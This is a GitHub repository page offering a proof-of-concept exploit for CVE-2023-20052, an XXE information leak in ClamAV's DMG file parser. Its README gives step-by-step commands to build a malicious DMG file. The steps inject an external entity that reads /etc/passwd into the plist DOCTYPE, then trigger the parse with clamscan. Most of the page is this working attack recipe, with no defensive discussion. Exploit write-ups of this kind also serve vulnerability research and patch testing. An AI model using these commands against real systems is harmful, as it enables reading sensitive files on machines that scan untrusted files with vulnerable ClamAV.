Skip to content
/ CVE-2023-20052 Public

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

27 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

nokn0wthing/CVE-2023-20052

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
1.png
1.png
 
 
2.png
2.png
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-20052

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage
To create malicious DMG file

git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

To trigger exploit
clamscan --debug exploit.dmg

About

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Resources

Readme
Activity

Stars

27 stars

Watchers

2 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages